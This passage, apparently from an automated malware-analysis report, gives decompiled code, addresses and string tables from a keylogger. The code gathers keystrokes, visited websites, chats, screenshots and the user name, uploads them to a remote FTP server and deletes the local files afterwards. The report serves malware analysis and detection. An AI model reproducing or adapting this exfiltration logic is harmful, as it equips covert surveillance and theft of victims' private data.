															}
															_t450 = FtpPutFileA( *(_t676 + 8),  *(_t676 - 0x24), _t513, 2, 0);
														}
													}
													__eflags =  *((char*)(_t661 + 0x14f));
													if( *((char*)(_t661 + 0x14f)) != 0) {
														goto L88;
													} else {
														__eflags =  *((char*)(_t661 + 0x363));
														if( *((char*)(_t661 + 0x363)) != 0) {
															_t450 = E00428DCB( *(_t676 - 0x20));
															__eflags = _t450;
															_pop(_t585);
															if(_t450 != 0) {
																__eflags =  *((char*)(_t661 + 0x140));
																_t512 = "chats.html";
																if( *((char*)(_t661 + 0x140)) == 0) {
																	_t512 = "bpkch.dat";
																}
																_t450 = FtpPutFileA( *(_t676 + 8),  *(_t676 - 0x20), _t512, 2, 0);
															}
														}
														__eflags =  *((char*)(_t661 + 0x14f));
														if( *((char*)(_t661 + 0x14f)) == 0) {
															L89:
															__eflags =  *((char*)(_t661 + 0x361));
															if(__eflags == 0) {
																L96:
																 *(_t676 - 0x70) = 0x80;
																GetUserNameA(_t676 - 0x334, _t676 - 0x70);
																_push("report.txt");
																_push(0x4558c8);
																_push(_t676 - 0x5c);
																L0043DE20();
																 *(_t676 - 4) = 0x18;
																_push(_t676 - 0x334);
																_push(_t676 - 0x3b4);
																_push(_t676 - 0x2c);
																_push( *(_t676 - 0x5c));
																_t458 = E004257A8(__eflags);
																__eflags = _t458;
																if(_t458 != 0) {
																	FtpPutFileA( *(_t676 + 8),  *(_t676 - 0x5c), "report.txt", 2, 0);
																	_t458 = DeleteFileA( *(_t676 - 0x5c));
																}
																_push("dt");
																L0043DE26();
																_push(_t458);
																_t459 = _t676 - 0x68;
																_push(0x4558c4);
																_push(_t459);
																 *(_t676 - 4) = 0x19;
																L0043E282();
																_push(0x5c);
																_push(_t459);
																 *(_t676 - 4) = 0x1a;
																_push(_t676 - 0x4c);
																L0043E14A();
																 *(_t676 - 4) = 0x1d;
																L0043DD36();
																 *(_t676 - 4) = 0x1c;
																L0043DD36();
																__eflags =  *((char*)(_t661 + 0x14f));
																if(__eflags != 0) {
																	L114:
																	InternetCloseHandle( *(_t676 + 8));
																	InternetCloseHandle( *(_t676 - 0x28));
																	_push("pk.bin");
																	 *((intOrPtr*)(_t661 + 0x120)) =  *((intOrPtr*)(_t676 - 0x2c));
																	_push(0x4558c8);
																	_push(_t676 + 8);
																	L0043DE20();
																	 *(_t676 - 4) = 0x2b;
																	E0040BC5C(_t661, __eflags,  *(_t676 + 8));
																	 *(_t676 - 4) = 0x1c;
																	L0043DD36();
																	 *0x4558e8 =  *0x4558e8 & 0x00000000;
																	__eflags =  *0x4558e8;
																	 *(_t676 - 4) = 0x18;
																	L0043DD36();
																	 *(_t676 - 4) = 7;
																	L0043DD36();
																	_t666 = 1;
																	goto L115;
																} else {
																	__eflags =  *((char*)(_t661 + 0x365));
																	if(__eflags == 0) {
																		goto L114;
																	}
																	_t669 = "dt";
																	_t466 = FtpCreateDirectoryA( *(_t676 + 8), _t669);
																	_push(_t669);
																	L0043DE26();
																	_t467 = _t676 - 0x19c;
																	_push(_t467);
																	 *(_t676 - 4) = 0x1e;
																	L0043DE26();
																	_push(0x2f);
																	_push(_t467);
																	_t468 = _t676 - 0x6c;
																	 *(_t676 - 4) = 0x1f;
																	_push(_t468);
																	L0043E14A();
																	_push(_t466);
																	_push(_t468);
																	_t469 = _t676 - 0x60;
																	 *(_t676 - 4) = 0x20;
																	_push(_t469);
																	L0043E282();
																	_push(0x2f);
																	_push(_t469);
																	 *(_t676 - 4) = 0x21;
																	_push(_t676 - 0x18);
																	L0043E14A();
																	 *(_t676 - 4) = 0x26;
																	L0043DD36();
																	 *(_t676 - 4) = 0x25;
																	L0043DD36();
																	 *(_t676 - 4) = 0x24;
																	L0043DD36();
																	 *(_t676 - 4) = 0x23;
																	L0043DD36();
																	 *(_t676 - 0x10) =  *(_t676 - 0x10) & 0x00000000;
																	__eflags =  *(_t676 - 0x7c);
																	if(__eflags < 0) {
																		L113:
																		 *(_t676 - 4) = 0x1c;
																		L0043DD36();
																		goto L114;
																	} else {
																		goto L101;
																	}
																	do {
																		L101:
																		_t672 =  *(_t676 - 0x10) << 2;
																		_push(( *(_t676 - 0x80))[_t672]);
																		_push(_t676 - 0x18);
																		_push(_t676 - 0x30);
																		L0043DE20();
																		__eflags =  *((char*)(_t661 + 0x140));
																		 *(_t676 - 4) = 0x27;
																		if( *((char*)(_t661 + 0x140)) != 0) {
																			_push(".jpg");
																			L0043E0CC();
																		}
																		_push(( *(_t676 - 0x80))[_t672]);
																		_push(_t676 - 0x4c);
																		_t477 = _t676 - 0x40;
																		_push(_t477);
																		L0043DE20();
																		 *(_t676 - 0x34) = FtpPutFileA( *(_t676 + 8),  *_t477,  *(_t676 - 0x30), 2, 0);
																		L0043DD36();
																		__eflags =  *(_t676 - 0x34);
																		if( *(_t676 - 0x34) == 0) {
																			__eflags =  *(_t676 - 0x44) & 0x00000002;
																			 *(_t676 - 4) = 0x29;
																			if(( *(_t676 - 0x44) & 0x00000002) != 0) {
																				_t358 = _t676 - 0x44;
																				 *_t358 =  *(_t676 - 0x44) & 0xfffffffd;
																				__eflags =  *_t358;
																				L0043DD36();
																			}
																			__eflags =  *(_t676 - 0x44) & 0x00000001;
																			 *(_t676 - 4) = 0x27;
																			if(( *(_t676 - 0x44) & 0x00000001) == 0) {
																				goto L112;
																			} else {
																				_t365 = _t676 - 0x44;
																				 *_t365 =  *(_t676 - 0x44) & 0xfffffffe;
																				__eflags =  *_t365;
																				goto L111;
																			}
																		} else {
																			__eflags =  *((char*)(_t661 + 0x361));
																			if( *((char*)(_t661 + 0x361)) == 0) {
																				goto L112;
																			}
																			_push(( *(_t676 - 0x80))[_t672]);
																			_push(_t676 - 0x4c);
																			_t483 = _t676 - 0x48;
																			_push(_t483);
																			L0043DE20();
																			DeleteFileA( *_t483);
																			L0043DD36();
																			__eflags =  *((char*)(_t661 + 0x140));
																			if( *((char*)(_t661 + 0x140)) == 0) {
																				goto L112;
																			}
																			_push("th_");
																			_push(_t676 - 0x4c);
																			_t487 = _t676 - 0x90;
																			_push(_t487);
																			L0043DE20();
																			_push(( *(_t676 - 0x80))[_t672]);
																			_push(_t487);
																			_t488 = _t676 - 0x8c;
																			 *(_t676 - 4) = 0x28;
																			_push(_t488);
																			L0043DE20();
																			DeleteFileA( *_t488);
																			L0043DD36();
																			 *(_t676 - 4) = 0x27;
																			L111:
																			L0043DD36();
																		}
																		L112:
																		 *(_t676 - 4) = 0x23;
																		L0043DD36();
																		 *(_t676 - 0x10) =  *(_t676 - 0x10) + 1;
																		__eflags =  *(_t676 - 0x10) -  *(_t676 - 0x7c);
																	} while (__eflags <= 0);
																	goto L113;
																}
															}
															E004254F6(L004044C9(E004207A5(L004044C9(_t450, _t585, 0x4558c4) + 0x78), L004044C9(_t450, _t585, 0x4558c4) + 0x78, 0x4558c4));
															_push("bpkch.dat");
															_t495 = _t676 - 0x14;
															_push(0x4558c4);
															_push(_t495);
															L0043DE20();
															DeleteFileA( *_t495);
															L0043DD36();
															__eflags =  *((char*)(_t661 + 0x140));
															if( *((char*)(_t661 + 0x140)) != 0) {
																DeleteFileA( *(_t676 - 0x1c));
																DeleteFileA( *(_t676 - 0x24));
																DeleteFileA( *(_t676 - 0x20));
															}
															__eflags =  *((char*)(_t661 + 0x14f));
															if(__eflags != 0) {
																DeleteFileA( *(_t676 - 0x38));
																__eflags =  *((char*)(_t661 + 0x365));
																if(__eflags == 0) {
																	goto L96;
																}
																 *(_t676 - 0x10) =  *(_t676 - 0x10) & 0x00000000;
																__eflags =  *(_t676 - 0x7c);
																if(__eflags < 0) {
																	goto L96;
																} else {
																	goto L95;
																}
																do {
																	L95:
																	_t498 =  *(_t676 - 0x80);
																	_push( *((intOrPtr*)(_t498 +  *(_t676 - 0x10) * 4)));
																	L0043DE26();
																	 *(_t676 - 0x14) = _t498;
																	_push("dt");
																	 *(_t676 - 4) = 0x10;
																	L0043DE26();
																	_push(_t498);
																	_t499 = _t676 - 0x34;
																	_push(0x4558c4);
																	_push(_t499);
																	 *(_t676 - 4) = 0x11;
																	L0043E282();
																	_push(0x5c);
																	_push(_t499);
																	_t500 = _t676 - 0x40;
																	 *(_t676 - 4) = 0x12;
																	_push(_t500);
																	L0043E14A();
																	_push( *(_t676 - 0x14));
																	 *(_t676 - 4) = 0x13;
																	_push(_t500);
																	_t501 = _t676 - 0x3c;
																	_push(_t501);
																	L0043E282();
																	DeleteFileA( *_t501);
																	L0043DD36();
																	 *(_t676 - 4) = 0x12;
																	L0043DD36();
																	 *(_t676 - 4) = 0x11;
																	L0043DD36();
																	 *(_t676 - 4) = 0x10;
																	L0043DD36();
																	 *(_t676 - 4) = 7;
																	L0043DD36();
																	_t503 =  *(_t676 - 0x80);
																	_push( *((intOrPtr*)(_t503 +  *(_t676 - 0x10) * 4)));
																	L0043DE26();
																	 *(_t676 - 0x14) = _t503;
																	_push("dt");
																	 *(_t676 - 4) = 0x14;
																	L0043DE26();
																	_push(_t503);
																	_t504 = _t676 - 0x60;
																	_push(0x4558c4);
																	_push(_t504);
																	 *(_t676 - 4) = 0x15;
																	L0043E282();
																	_push("\\th_");
																	_push(_t504);
																	_t505 = _t676 - 0x6c;
																	 *(_t676 - 4) = 0x16;
																	_push(_t505);
																	L0043DE20();
																	_push( *(_t676 - 0x14));
																	 *(_t676 - 4) = 0x17;
																	_push(_t505);
																	_t506 = _t676 - 0x30;
																	_push(_t506);
																	L0043E282();
																	DeleteFileA( *_t506);
																	L0043DD36();
																	 *(_t676 - 4) = 0x16;
																	L0043DD36();
																	 *(_t676 - 4) = 0x15;
																	L0043DD36();
																	 *(_t676 - 4) = 0x14;
																	L0043DD36();
																	 *(_t676 - 4) = 7;
																	L0043DD36();
																	 *(_t676 - 0x10) =  *(_t676 - 0x10) + 1;
																	__eflags =  *(_t676 - 0x10) -  *(_t676 - 0x7c);
																} while (__eflags <= 0);
															}
															goto L96;
														} else {
															goto L88;
														}
													}
												}
											} else {
												goto L68;
											}
										}
										_t519 = FtpSetCurrentDirectoryA(_t428, _t676 - 0x19c);
										__eflags = _t519;
										if(_t519 != 0) {
											goto L63;
										}
										InternetCloseHandle( *(_t676 + 8));
										InternetCloseHandle( *(_t676 - 0x28));
										goto L57;
									}
									_push( *(_t676 - 0x28));
									goto L56;
								} else {
									L56:
									InternetCloseHandle();
									L57:
									 *0x4558e8 = 0;
									_t666 = 0;
									L115:
									 *(_t676 - 4) = 6;
									L0043DD36();
									goto L116;
								}
							}
							__eflags = _t565 >> 0xa -  *((intOrPtr*)(_t661 + 0x674));
							if(_t565 >> 0xa >=  *((intOrPtr*)(_t661 + 0x674))) {
								goto L53;
							}
							__eflags =  *((char*)(_t661 + 0x140));
							if( *((char*)(_t661 + 0x140)) != 0) {
								DeleteFileA( *(_t676 - 0x50));
								DeleteFileA( *(_t676 - 0x54));
								DeleteFileA( *(_t676 - 0x58));
							}
							__eflags =  *((char*)(_t661 + 0x14f));
							if( *((char*)(_t661 + 0x14f)) == 0) {
								goto L52;
							} else {
								_push( *(_t676 - 0x38));
								goto L51;
							}
						}
						_push("Logs.zip");
						_t528 = _t676 - 0x18;
						_push(0x4558c4);
						_push(_t528);
						L0043DE20();
						_push(_t528);
						 *(_t676 - 4) = 8;
						L0043DFCA();
						 *(_t676 - 4) = 7;
						L0043DD36();
						_t530 = E004187F0( *(_t676 - 0x38), _t661 + 0x2d4);
						__eflags =  *(_t661 + 0x362);
						_t576 = _t530;
						 *(_t676 - 0x30) = _t530;
						if( *(_t661 + 0x362) != 0) {
							_t548 = E00428DCB( *(_t676 - 0x1c));
							__eflags = _t548;
							if(_t548 != 0) {
								__eflags =  *((char*)(_t661 + 0x140));
								_t549 = "keystrokes.html";
								if( *((char*)(_t661 + 0x140)) == 0) {
									_t549 = "bpk.dat";
								}
								E0041883F(_t576, _t549,  *(_t676 - 0x1c));
								_t679 = _t679 + 0xc;
							}
						}
						__eflags =  *((char*)(_t661 + 0x364));
						if( *((char*)(_t661 + 0x364)) != 0) {
							_t545 = E00428DCB( *(_t676 - 0x24));
							__eflags = _t545;
							if(_t545 != 0) {
								__eflags =  *((char*)(_t661 + 0x140));
								_t546 = "websites.html";
								if( *((char*)(_t661 + 0x140)) == 0) {
									_t546 = "web.dat";
								}
								E0041883F(_t576, _t546,  *(_t676 - 0x24));
								_t679 = _t679 + 0xc;
							}
						}
						__eflags =  *((char*)(_t661 + 0x363));
						if( *((char*)(_t661 + 0x363)) != 0) {
							_t542 = E00428DCB( *(_t676 - 0x20));
							__eflags = _t542;
							if(_t542 != 0) {
								__eflags =  *((char*)(_t661 + 0x140));
								_t543 = "chats.html";
								if( *((char*)(_t661 + 0x140)) == 0) {
									_t543 = "bpkch.dat";
								}
								E0041883F(_t576, _t543,  *(_t676 - 0x20));
								_t679 = _t679 + 0xc;
							}
						}
						__eflags =  *((char*)(_t661 + 0x365));
						if( *((char*)(_t661 + 0x365)) == 0) {
							L43:
							E00418858(_t659,  *(_t676 - 0x30));
							_t532 = _t676 - 0x5d0;
							_push(_t532);
							_push( *(_t676 - 0x38));
							L0043E294();
							_t565 =  *(_t676 - 0x5c4);
							__eflags = _t532;
							if(_t532 == 0) {
								_t565 =  *(_t676 + 8);
							}
							goto L45;
						} else {
							_t577 = 0;
							__eflags =  *(_t676 - 0x7c);
							if( *(_t676 - 0x7c) < 0) {
								goto L43;
							} else {
								goto L42;
							}
							do {
								L42:
								_t533 =  *(_t676 - 0x80);
								_push( *((intOrPtr*)(_t533 + _t577 * 4)));
								L0043DE26();
								 *(_t676 - 0x18) = _t533;
								_push("dt");
								 *(_t676 - 4) = 9;
								L0043DE26();
								_push(_t533);
								_t534 = _t676 - 0x40;
								_push(0x4558c4);
								_push(_t534);
								 *(_t676 - 4) = 0xa;
								L0043E282();
								_push(0x5c);
								_push(_t534);
								_t535 = _t676 - 0x34;
								 *(_t676 - 4) = 0xb;
								_push(_t535);
								L0043E14A();
								_push( *(_t676 - 0x18));
								 *(_t676 - 4) = 0xc;
								_push(_t535);
								_t536 = _t676 - 0x48;
								_push(_t536);
								L0043E282();
								 *(_t676 - 0x18) =  *_t536;
								_t538 =  *(_t676 - 0x80);
								 *(_t676 - 4) = 0xd;
								_push( *((intOrPtr*)(_t538 + _t577 * 4)));
								L0043DE26();
								_push(".jpg");
								_push(_t538);
								 *(_t676 - 4) = 0xe;
								_push(_t676 - 0x10);
								L0043DE20();
								 *(_t676 - 4) = 0xf;
								E0041883F( *(_t676 - 0x30),  *(_t676 - 0x10),  *(_t676 - 0x18));
								_t679 = _t679 + 0xc;
								 *(_t676 - 4) = 0xe;
								L0043DD36();
								 *(_t676 - 4) = 0xd;
								L0043DD36();
								 *(_t676 - 4) = 0xc;
								L0043DD36();
								 *(_t676 - 4) = 0xb;
								L0043DD36();
								 *(_t676 - 4) = 0xa;
								L0043DD36();
								 *(_t676 - 4) = 9;
								L0043DD36();
								 *(_t676 - 4) = 7;
								L0043DD36();
								_t577 = _t577 + 1;
								__eflags = _t577 -  *(_t676 - 0x7c);
							} while (_t577 <=  *(_t676 - 0x7c));
							goto L43;
						}
					} else {
						 *0x4558e8 =  *0x4558e8 & _t565;
						_t666 = 0;
						L116:
						 *(_t676 - 4) = 5;
						E0042839B(_t676 - 0x84);
						 *(_t676 - 4) = 4;
						L0043DD36();
						 *(_t676 - 4) = 3;
						L0043DD36();
						 *(_t676 - 4) = 2;
						L0043DD36();
						 *(_t676 - 4) = 1;
						L0043DD36();
						 *(_t676 - 4) =  *(_t676 - 4) & 0x00000000;
						L0043DD36();
						_t403 = _t676 - 4;
						 *_t403 =  *(_t676 - 4) | 0xffffffff;
						__eflags =  *_t403;
						L0043DD36();
						_t445 = _t666;
						goto L117;
					}
				} else {
					 *0x4558e8 =  *0x4558e8 & 0x00000000;
					_t445 = 0;
					L117:
					 *[fs:0x0] =  *((intOrPtr*)(_t676 - 0xc));
					return _t445;
				}
			}

0x004258ff
0x00425904
0x00425909
0x0042590f
0x00425917
0x00425918
0x0042591d
0x00425927
0x0042593e
0x00425946
0x00425947
0x00425948
0x0042594d
0x00425951
0x00425959
0x0042595a
0x0042595b
0x00425960
0x00425968
0x00425969
0x0042596a
0x0042596e
0x00425978
0x00425980
0x00425981
0x00425982
0x00425986
0x0042598b
0x00425993
0x00425994
0x00425995
0x00425999
0x0042599e
0x004259a6
0x004259a7
0x004259a8
0x004259ac
0x004259b1
0x004259b8
0x004259bc
0x004259be
0x004259c0
0x004259c3
0x004259c6
0x004259cb
0x004259ce
0x004259d0
0x004259d8
0x004259d9
0x004259d9
0x004259de
0x004259e5
0x004259e7
0x004259e9
0x004259ec
0x004259ef
0x004259f4
0x004259f7
0x004259f9
0x00425a01
0x00425a02
0x00425a02
0x00425a07
0x00425a0e
0x00425a10
0x00425a12
0x00425a15
0x00425a18
0x00425a1d
0x00425a20
0x00425a22
0x00425a2a
0x00425a2b
0x00425a2b
0x00425a22
0x00425a0e
0x004259e5
0x00425a30
0x00425a3b
0x00425a3e
0x00425a43
0x00425a49
0x00425a4f
0x00425a53
0x00425a55
0x00425a5b
0x00425a5c
0x00425a5f
0x00425a64
0x00425a66
0x00425a68
0x00425a6e
0x00425a6e
0x00425a66
0x00425a71
0x00425a78
0x00425a7a
0x00425a80
0x00425a81
0x00425a84
0x00425a89
0x00425a8b
0x00425a8d
0x00425a8d
0x00425a93
0x00425a93
0x00425a8b
0x00425a96
0x00425a9d
0x00425a9f
0x00425aa5
0x00425aa6
0x00425aa9
0x00425aae
0x00425ab0
0x00425ab2
0x00425ab2
0x00425ab8
0x00425ab8
0x00425ab0
0x00425abb
0x00425ac2
0x00425aca
0x00425ad1
0x00425ad2
0x00425ad3
0x00425ad8
0x00425adb
0x00425adb
0x00425ae1
0x00425ae1
0x00425ae4
0x00425ae6
0x00425af8
0x00425afd
0x00425b04
0x00425b08
0x00425d1a
0x00425d1a
0x00425d21
0x00425d67
0x00425d7b
0x00425d7d
0x00425d84
0x00425d92
0x00425d92
0x00425d9f
0x00425da5
0x00425da7
0x00425daa
0x00425dab
0x00425dc8
0x00425df2
0x00425df8
0x00425dfa
0x00425dfd
0x00425e04
0x00425e0b
0x00425e31
0x00425e34
0x00425e43
0x00425e4e
0x00425e4f
0x00425e54
0x00425e56
0x00425e5a
0x00425e5d
0x00425e62
0x00425e65
0x00425e69
0x00425e6c
0x00425e71
0x00425e74
0x00425e78
0x00425e7b
0x00425e80
0x00425e83
0x00425e87
0x00425e8a
0x00425e92
0x00425e94
0x00425e98
0x00425ebf
0x00425ed2
0x00425ed8
0x00425eda
0x00425f34
0x00425f3d
0x00425f3f
0x00425d58
0x00425d58
0x00425d5a
0x00425d5a
0x00425d5c
0x00000000
0x00425d5c
0x00425edc
0x00425ee9
0x00425ef2
0x00425ef8
0x00425f00
0x00425f0e
0x00425f0e
0x00425f00
0x00425f1e
0x00425f2a
0x00425f30
0x00425f32
0x00425f47
0x00425f54
0x00425f56
0x00425f5d
0x00425f62
0x00425f67
0x00425f69
0x00425f6a
0x00425f6c
0x00425f73
0x00425f78
0x00425f7a
0x00425f7a
0x00425f8a
0x00425f8a
0x00425f6a
0x00425f5d
0x00425f8c
0x00425f93
0x00426013
0x00426022
0x00000000
0x00425f95
0x00425f95
0x00425f9c
0x00425fa1
0x00425fa6
0x00425fa8
0x00425fa9
0x00425fab
0x00425fb2
0x00425fb7
0x00425fb9
0x00425fb9
0x00425fc9
0x00425fc9
0x00425fa9
0x00425fcb
0x00425fd2
0x00000000
0x00425fd4
0x00425fd4
0x00425fdb
0x00425fe0
0x00425fe5
0x00425fe7
0x00425fe8
0x00425fea
0x00425ff1
0x00425ff6
0x00425ff8
0x00425ff8
0x00426008
0x00426008
0x00425fe8
0x0042600a
0x00426011
0x00426024
0x00426024
0x00426031
0x004261e6
0x004261e9
0x004261f8
0x004261fe
0x00426206
0x0042620b
0x0042620c
0x00426217
0x0042621b
0x00426222
0x00426226
0x00426227
0x0042622a
0x00426232
0x00426234
0x00426245
0x0042624e
0x0042624e
0x00426250
0x00426258
0x0042625d
0x0042625e
0x00426261
0x00426262
0x00426263
0x00426267
0x0042626c
0x0042626e
0x00426272
0x00426276
0x00426277
0x0042627f
0x00426283
0x0042628b
0x0042628f
0x00426294
0x0042629b
0x00426498
0x004264a1
0x004264a6
0x004264ab
0x004264b0
0x004264b9
0x004264be
0x004264bf
0x004264c8
0x004264cc
0x004264d4
0x004264d8
0x004264dd
0x004264dd
0x004264e7
0x004264eb
0x004264f3
0x004264f7
0x004264fe
0x00000000
0x004262a1
0x004262a1
0x004262a8
0x00000000
0x00000000
0x004262ae
0x004262b7
0x004262bd
0x004262c1
0x004262c8
0x004262d1
0x004262d2
0x004262d6
0x004262db
0x004262dd
0x004262de
0x004262e1
0x004262e5
0x004262e6
0x004262eb
0x004262ec
0x004262ed
0x004262f0
0x004262f4
0x004262f5
0x004262fa
0x004262fc
0x00426300
0x00426304
0x00426305
0x0042630d
0x00426311
0x00426319
0x0042631d
0x00426325
0x00426329
0x00426331
0x00426335
0x0042633a
0x0042633e
0x00426342
0x0042648c
0x0042648f
0x00426493
0x00000000
0x00000000
0x00000000
0x00000000
0x00426348
0x00426348
0x00426350
0x00426353
0x00426359
0x0042635d
0x0042635e
0x00426363
0x0042636a
0x0042636e
0x00426370
0x00426378
0x00426378
0x00426380
0x00426386
0x00426387
0x0042638a
0x0042638b
0x004263a6
0x004263a9
0x004263ae
0x004263b2
0x00426439
0x0042643d
0x00426444
0x00426446
0x00426446
0x00426446
0x00426450
0x00426450
0x00426455
0x00426459
0x00426460
0x00000000
0x00426462
0x00426462
0x00426462
0x00426462
0x00000000
0x00426466
0x004263b8
0x004263b8
0x004263bf
0x00000000
0x00000000
0x004263c8
0x004263ce
0x004263cf
0x004263d2
0x004263d3
0x004263da
0x004263df
0x004263e4
0x004263eb
0x00000000
0x00000000
0x004263f4
0x004263ff
0x00426400
0x00426406
0x00426407
0x0042640c
0x0042640d
0x0042640e
0x00426414
0x00426418
0x00426419
0x00426420
0x00426428
0x0042642d
0x0042646c
0x0042646c
0x0042646c
0x00426471
0x00426474
0x00426478
0x0042647d
0x00426483
0x00426483
0x00000000
0x00426348
0x0042629b
0x0042604d
0x00426052
0x00426057
0x0042605a
0x0042605b
0x0042605c
0x00426063
0x00426068
0x0042606d
0x00426074
0x00426079
0x0042607e
0x00426083
0x00426083
0x00426085
0x0042608c
0x00426095
0x00426097
0x0042609e
0x00000000
0x00000000
0x004260a4
0x004260a8
0x004260ac
0x00000000
0x00000000
0x00000000
0x00000000
0x004260b2
0x004260b2
0x004260b2
0x004260b8
0x004260be
0x004260c3
0x004260c6
0x004260ce
0x004260d2
0x004260d7
0x004260d8
0x004260db
0x004260dc
0x004260dd
0x004260e1
0x004260e6
0x004260e8
0x004260e9
0x004260ec
0x004260f0
0x004260f1
0x004260f6
0x004260f9
0x004260fd
0x004260fe
0x00426101
0x00426102
0x00426109
0x0042610e
0x00426116
0x0042611a
0x00426122
0x00426126
0x0042612e
0x00426132
0x0042613a
0x0042613e
0x00426143
0x00426149
0x0042614f
0x00426154
0x00426157
0x0042615f
0x00426163
0x00426168
0x00426169
0x0042616c
0x0042616d
0x0042616e
0x00426172
0x00426177
0x0042617c
0x0042617d
0x00426180
0x00426184
0x00426185
0x0042618a
0x0042618d
0x00426191
0x00426192
0x00426195
0x00426196
0x0042619d
0x004261a2
0x004261aa
0x004261ae
0x004261b6
0x004261ba
0x004261c2
0x004261c6
0x004261ce
0x004261d2
0x004261d7
0x004261dd
0x004261dd
0x004260b2
0x00000000
0x00000000
0x00000000
0x00000000
0x00426011
0x00425fd2
0x00000000
0x00000000
0x00000000
0x00425f32
0x00425e15
0x00425e1b
0x00425e1d
0x00000000
0x00000000
0x00425e28
0x00425e2d
0x00000000
0x00425e2d
0x00425dff
0x00000000
0x00425dad
0x00425dad
0x00425dad
0x00425db3
0x00425db3
0x00425db9
0x004264ff
0x00426502
0x00426506
0x00000000
0x00426506
0x00425dab
0x00425d26
0x00425d2c
0x00000000
0x00000000
0x00425d2e
0x00425d3b
0x00425d40
0x00425d45
0x00425d4a
0x00425d4a
0x00425d4c
0x00425d53
0x00000000
0x00425d55
0x00425d55
0x00000000
0x00425d55
0x00425d53
0x00425b0e
0x00425b13
0x00425b16
0x00425b17
0x00425b18
0x00425b1d
0x00425b21
0x00425b25
0x00425b2d
0x00425b31
0x00425b40
0x00425b45
0x00425b4d
0x00425b50
0x00425b53
0x00425b58
0x00425b5d
0x00425b60
0x00425b62
0x00425b69
0x00425b6e
0x00425b70
0x00425b70
0x00425b7a
0x00425b7f
0x00425b7f
0x00425b60
0x00425b82
0x00425b89
0x00425b8e
0x00425b93
0x00425b96
0x00425b98
0x00425b9f
0x00425ba4
0x00425ba6
0x00425ba6
0x00425bb0
0x00425bb5
0x00425bb5
0x00425b96
0x00425bb8
0x00425bbf
0x00425bc4
0x00425bc9
0x00425bcc
0x00425bce
0x00425bd5
0x00425bda
0x00425bdc
0x00425bdc
0x00425be6
0x00425beb
0x00425beb
0x00425bcc
0x00425bee
0x00425bf5
0x00425cf5
0x00425cf8
0x00425cfe
0x00425d04
0x00425d05
0x00425d08
0x00425d0d
0x00425d13
0x00425d15
0x00425d17
0x00425d17
0x00000000
0x00425bfb
0x00425bfb
0x00425bfd
0x00425c00
0x00000000
0x00000000
0x00000000
0x00000000
0x00425c06
0x00425c06
0x00425c06
0x00425c0c
0x00425c0f
0x00425c14
0x00425c17
0x00425c1f
0x00425c23
0x00425c28
0x00425c29
0x00425c2c
0x00425c2d
0x00425c2e
0x00425c32
0x00425c37
0x00425c39
0x00425c3a
0x00425c3d
0x00425c41
0x00425c42
0x00425c47
0x00425c4a
0x00425c4e
0x00425c4f
0x00425c52
0x00425c53
0x00425c5d
0x00425c60
0x00425c63
0x00425c67
0x00425c6a
0x00425c6f
0x00425c74
0x00425c78
0x00425c7c
0x00425c7d
0x00425c87
0x00425c8f
0x00425c94
0x00425c9a
0x00425c9e
0x00425ca6
0x00425caa
0x00425cb2
0x00425cb6
0x00425cbe
0x00425cc2
0x00425cca
0x00425cce
0x00425cd6
0x00425cda
0x00425ce2
0x00425ce6
0x00425ceb
0x00425cec
0x00425cec
0x00000000
0x00425c06
0x00425ae8
0x00425ae8
0x00425aee
0x0042650b
0x00426511
0x00426515
0x0042651d
0x00426521
0x00426529
0x0042652d
0x00426535
0x00426539
0x00426541
0x00426545
0x0042654a
0x00426551
0x00426556
0x00426556
0x00426556
0x0042655d
0x00426562
0x00000000
0x00426565
0x00425929
0x00425929
0x00425930
0x00426566
0x0042656a
0x00426572
0x00426572

APIs

__EH_prolog.LIBCMT ref: 00425904
#3811.MFC42(?), ref: 00425918
#924.MFC42(?,004558C4,bpk.dat,?,?,?), ref: 00425948
#924.MFC42(?,004558C4,web.dat,?,004558C4,bpk.dat,?,?,?), ref: 0042595B
#924.MFC42(?,004558C4,bpkch.dat,?,004558C4,web.dat,?,004558C4,bpk.dat,?,?,?), ref: 0042596E
#924.MFC42(?,004558C8,keystrokes.html,?,004558C4,bpkch.dat,?,004558C4,web.dat,?,004558C4,bpk.dat,?,?,?), ref: 00425986
#924.MFC42(?,004558C8,websites.html,?,004558C8,keystrokes.html,?,004558C4,bpkch.dat,?,004558C4,web.dat,?,004558C4,bpk.dat), ref: 00425999
#924.MFC42(?,004558C8,chats.html,?,004558C8,websites.html,?,004558C8,keystrokes.html,?,004558C4,bpkch.dat,?,004558C4,web.dat,?), ref: 004259AC
#858.MFC42(?,?,?), ref: 004259D9
#858.MFC42(?,?,?,?,?,?), ref: 00425A02
#858.MFC42(?,?,?,?,?,?,?,?,?), ref: 00425A2B
#3790.MFC42(?,?,00000000,00000001,?,004558C8,chats.html,?,004558C8,websites.html,?,004558C8,keystrokes.html,?,004558C4,bpkch.dat), ref: 00425A5F

Strings

bpk.dat, xrefs: 0042593E, 00425B70, 00425F7A
\th_, xrefs: 00426177
report.txt, xrefs: 004261FE, 0042623A
.jpg, xrefs: 00425C6F, 00426370
web.dat, xrefs: 00425951, 00425BA6, 00425FB9
pk.bin, xrefs: 004264AB
chats.html, xrefs: 0042599E, 00425BD5, 00425BE4, 00425FF1, 00426001
th_, xrefs: 004263F4
bpkch.dat, xrefs: 00425960, 00425BDC, 00425FF8, 00426052
&+D, xrefs: 004258FF
websites.html, xrefs: 0042598B, 00425B9F, 00425BAE, 00425FB2, 00425FC2
Logs.zip, xrefs: 00425B0E, 00426017
+, xrefs: 004264C8
%02d-%02d-%02d-%02d-%02d-%02d, xrefs: 00425EB9
/, xrefs: 00425EF8
keystrokes.html, xrefs: 00425978, 00425B69, 00425B78, 00425F73, 00425F83

Memory Dump Source

Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
